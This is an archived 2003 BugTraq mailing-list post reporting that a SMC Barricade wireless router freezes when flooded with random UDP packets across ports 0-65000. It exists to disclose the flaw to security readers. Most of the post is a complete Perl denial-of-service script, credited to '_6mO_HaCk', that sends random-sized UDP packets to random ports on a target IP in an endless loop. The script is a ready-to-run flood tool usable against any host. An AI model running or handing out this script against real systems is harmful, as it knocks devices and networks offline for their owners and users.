SecurityFocus BUGTRAQ Mailing List: BugTraqLink Number One Link Number One Link Number Two Link Number Two Link Number One Link Number One Link Number Two Link Number Two Entire Site Advisories Calendar Columnists Elsewhere Guest Feature Infocus Library Links Mailing Lists (all) -- BUGTRAQ -- FOCUS-IDS -- FOCUS-IH -- FOCUS-LINUX -- FOCUS-MS -- FOCUS-SUN -- FOCUS-VIRUS -- FORENSICS -- INCIDENTS -- PEN-TEST -- SEC JOBS -- SF NEWS -- VULN-DEV News Products Services Tools Vulns BUGTRAQ ARCHIVE [ Message Index ] [ Thread Index ][ Reply ] [ prev Msg by Date ][ next Msg by Date ] To: BugTraq Subject: SMC Router Denial of Service exploit Date: Sep 26 2003 7:13AM Author: Message-ID: <20030926071352.32475.qmail@sf-www3-symnsj.securityfocus.com> Howdy, Tested on an SMC2404WBR - BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL Broadband Router. Sending a stream of UDP random packets to multiple ports 0-65000 on the router will cause the router to freeze until a soft reset is performed on it. In one case, the router did survive but did not come back "alive" for around 15 minutes. All other tries (2 others) the router had to be reset. This attack was performed using the Zonealarm+Windows 98 DoS code written by _6mO_HaCk. The code follows: -----------------snip--------------------- #!/usr/bin/perl use Socket; system(clear); print "\n"; print "--- ZoneAlarm Remote DoS Xploit\n"; print "---\n"; print "--- Discovered & Coded By _6mO_HaCk\n"; print "\n"; if(!defined($ARGV[0])) { &usage } my ($target); $target=$ARGV[0]; my $ia = inet_aton($target) || die ("[-] Unable to resolve $target"); socket(DoS, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$target"); print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n"; for (;;) { $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand; $port=int(rand 65000) +1; send(DoS, 0, $size, sockaddr_in($port, $iaddr)); } sub usage {die("\n\n[*] Usage : perl $0 \n\n");} -----------------------snip-------------------------------------- Dave, put down the Windows disk Dave. Dave? DAVE?!!? - Hal9000 Want to link to this message? Use this URL: Disclaimer, Terms & Conditions About this List Featured Lists: ARIS Users bugtraq bugtraq-es bugtraq-french NEW bugtraq-jp firewalls focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics forensics-es honeypots incidents libnet pen-test secevents secpapers secprog sectools secureshell security-basics security-management NEW securityjobs vpn vuln-dev webappsec Newsletters: sf-news ms-secnews linux-secnews [ more . . . ] Privacy Statement Copyright © 1999-2003 SecurityFocus